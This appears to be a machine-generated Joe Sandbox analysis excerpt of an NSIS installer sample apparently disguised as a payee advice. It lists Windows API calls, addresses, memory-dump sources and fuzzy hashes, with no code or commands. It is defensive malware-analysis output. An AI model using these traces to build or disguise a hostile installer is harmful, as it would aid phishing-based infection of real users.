• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
• Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
• Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
• Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
APIs
• DestroyWindow.USER32(?,00000000), ref: 00402D35
• GetTickCount.KERNEL32 ref: 00402D53
• wsprintfW.USER32 ref: 00402D81
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
• ShowWindow.USER32(00000000,00000005), ref: 00402DB3
  • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
• Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
• GetMessagePos.USER32 ref: 00404A81
• ScreenToClient.USER32(?,?), ref: 00404A9B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
• Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                          APIs
                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                          • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                          • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                          • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                          • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                                          • String ID: x>A
                                                                                                                                          • API String ID: 2146148272-3854404225
                                                                                                                                          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                                                                          APIs
                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061E1
                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 004061F5
                                                                                                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75923420,00403512), ref: 00406208
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                          • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                          • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                          • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                          • String ID: 8
                                                                                                                                          • API String ID: 1453599865-4194326291
                                                                                                                                          • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                          • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                          • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                          • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                          APIs
                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1941528284-0
                                                                                                                                          • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                          • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                                                          • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                                                          • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                          • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                          • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                          • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                          • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                          • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                          • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                          • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                                                          • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
APIs
• GetDC.USER32(?), ref: 00401D44
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
• ReleaseDC.USER32(?,00000000), ref: 00401D71
• CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
• Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
• Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
• Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
APIs
• SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
• WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: File$PointerWrite
• String ID: x>A
• API String ID: 539440098-3854404225
• Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
• Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
• Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
• Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
APIs
• lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
• wsprintfW.USER32 ref: 00404A12
• SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
• Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
• Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
• Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
• Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
• Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
• Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
APIs
• RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
• lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
• RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
• RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID:
• API String ID: 1356686001-0
• Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
• Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
• Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
• Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
APIs
  • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,75922EE0,00405792,?,00436800,75922EE0,00434000), ref: 004059EE
  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
• CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
• GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
• GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
• SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
• String ID:
• API String ID: 3751793516-0
• Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
• Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
• Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
• Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
• GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
• VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
